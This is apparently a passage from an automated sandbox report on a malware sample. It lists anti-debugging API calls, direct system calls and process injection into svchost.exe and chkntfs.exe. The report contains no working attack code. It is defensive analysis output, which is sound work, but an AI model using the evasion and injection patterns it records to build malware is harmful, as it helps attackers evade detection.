            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]  1_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]  1_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]  1_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]  1_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B5EBFC mov eax, dword ptr fs:[00000030h]  1_2_03B5EBFC
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]  1_2_03BBCBF0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]  1_2_03BDEBD0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]  1_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]  1_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]  1_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]  1_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]  1_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]  1_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B5EB20 mov eax, dword ptr fs:[00000030h]  1_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B5EB20 mov eax, dword ptr fs:[00000030h]  1_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BF8B28 mov eax, dword ptr fs:[00000030h]  1_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BF8B28 mov eax, dword ptr fs:[00000030h]  1_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]  1_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]  1_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]  1_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]  1_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]  1_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]  1_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]  1_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]  1_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]  1_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]  1_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]  1_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]  1_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]  1_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03C04B00 mov eax, dword ptr fs:[00000030h]  1_2_03C04B00
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B2CB7E mov eax, dword ptr fs:[00000030h]  1_2_03B2CB7E
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B28B50 mov eax, dword ptr fs:[00000030h]  1_2_03B28B50
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BDEB50 mov eax, dword ptr fs:[00000030h]  1_2_03BDEB50
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BE4B4B mov eax, dword ptr fs:[00000030h]  1_2_03BE4B4B
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BE4B4B mov eax, dword ptr fs:[00000030h]  1_2_03BE4B4B
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]  1_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]  1_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BFAB40 mov eax, dword ptr fs:[00000030h]  1_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BD8B42 mov eax, dword ptr fs:[00000030h]  1_2_03BD8B42
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]  1_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]  1_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B86AA4 mov eax, dword ptr fs:[00000030h]  1_2_03B86AA4
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B68A90 mov edx, dword ptr fs:[00000030h]  1_2_03B68A90
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]  1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]  1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]  1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]  1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]  1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]  1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]  1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]  1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]  1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03C04A80 mov eax, dword ptr fs:[00000030h]  1_2_03C04A80
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]  1_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]  1_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B30AD0 mov eax, dword ptr fs:[00000030h]  1_2_03B30AD0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]  1_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]  1_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]  1_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]  1_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]  1_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]  1_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]  1_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B6CA24 mov eax, dword ptr fs:[00000030h]  1_2_03B6CA24
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B5EA2E mov eax, dword ptr fs:[00000030h]  1_2_03B5EA2E
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BBCA11 mov eax, dword ptr fs:[00000030h]  1_2_03BBCA11
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]  1_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]  1_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]  1_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]  1_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]  1_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BDEA60 mov eax, dword ptr fs:[00000030h]  1_2_03BDEA60
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]  1_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]  1_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]  1_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]  1_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]  1_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]  1_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]  1_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]  1_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]  1_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BB89B3 mov esi, dword ptr fs:[00000030h]  1_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]  1_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]  1_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]  1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]  1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]  1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]  1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]  1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]  1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]  1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]  1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]  1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]  1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]  1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]  1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]  1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]  1_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]  1_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]  1_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]  1_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]  1_2_03BBE9E0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]  1_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]  1_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]  1_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]  1_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]  1_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]  1_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B649D0 mov eax, dword ptr fs:[00000030h]  1_2_03B649D0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]  1_2_03BFA9D3
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BC69C0 mov eax, dword ptr fs:[00000030h]  1_2_03BC69C0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03C04940 mov eax, dword ptr fs:[00000030h]  1_2_03C04940
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BB892A mov eax, dword ptr fs:[00000030h]  1_2_03BB892A
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BC892B mov eax, dword ptr fs:[00000030h]  1_2_03BC892B
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BBC912 mov eax, dword ptr fs:[00000030h]  1_2_03BBC912
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]  1_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]  1_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]  1_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]  1_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]  1_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]  1_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BBC97C mov eax, dword ptr fs:[00000030h]  1_2_03BBC97C
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]  1_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]  1_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]  1_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]  1_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B7096E mov edx, dword ptr fs:[00000030h]  1_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]  1_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BB0946 mov eax, dword ptr fs:[00000030h]  1_2_03BB0946
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03C008C0 mov eax, dword ptr fs:[00000030h]  1_2_03C008C0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BBC89D mov eax, dword ptr fs:[00000030h]  1_2_03BBC89D
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B30887 mov eax, dword ptr fs:[00000030h]  1_2_03B30887
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]  1_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]  1_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]  1_2_03BFA8E4
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]  1_2_03B5E8C0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]  1_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]  1_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]  1_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B52835 mov ecx, dword ptr fs:[00000030h]  1_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]  1_2_03B52835
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_009E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,  0_2_009E0B62
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_009B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,  0_2_009B2622
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_009A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,  0_2_009A083F
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_009A09D5 SetUnhandledExceptionFilter,  0_2_009A09D5
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Code function: 0_2_009A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,  0_2_009A0C21

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe  NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\p4LNUqyKZM.exe  Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Windows\SysWOW64\chkntfs.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\chkntfs.exe  Section loaded: NULL target: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe protection: read write
            Source: C:\Windows\SysWOW64\chkntfs.exe  Section loaded: NULL target: C:\Program Files (x86)\lADwcZzJhzLcMEJhntWadsYrEFIJRBLxxiDKORwMMEmwwhGQBHrkRFnW\SCsLZYqthBle.exe protection: execute and read and write
